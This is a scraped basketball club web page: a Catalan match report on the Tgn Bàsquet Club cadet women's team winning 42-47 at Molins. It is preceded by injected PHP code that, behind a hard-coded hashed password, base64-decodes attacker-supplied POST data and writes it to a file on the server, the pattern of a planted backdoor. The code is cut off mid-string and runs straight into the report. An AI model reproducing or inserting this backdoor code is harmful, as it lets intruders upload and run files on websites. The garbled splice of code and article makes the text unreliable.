function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Fem 08B suma una victòria clau a Molins (42-47) - Tgn Bàsquet Club -

El Cadet Fem 08B suma una victòria clau a Molins (42-47)

Updated: gener 30, 2024

El Cadet Fem 08B va aconseguir una treballada victòria a la pista del Bàsquet Molins per un ajustat 42-47. La victòria del conjunt lila s’ha començat a fabricar amb una gran primera meitat de les tarrragonines, que han sortit a pista molt concentrades i han pogut desenvolupar el seu joc ofensiu, aconseguint un aventatge de gairebé 10 punts al descans (13-24).

A la represa, l’equip local ha plantejat una zona 1-3-1 que ha posat molts problemes a l’atac lila, permetent que el Bàsquet Molins s’apropès en el marcador. Tot i això, l’equip entrenat per Adrià Adam s’ha adaptat a la proposta defensiva del rival i han aconseguit tornar a sumar punts per mantenir-se per davant al marcador.

A l’últim quart s’ha mantingut la duresa del partit, que ha estat molt físic durant els 40 minuts, i prova d’això són els 51 tirs lliures que s’han llençat durant l’encontre. El TGN ha mantingut la sang freda als instants finals i ha pogut emportar-se una victòria important al camp d’un rival directe a la classificació i que confirma el bon estat de forma de l’equip amb 2 victòries consecutives.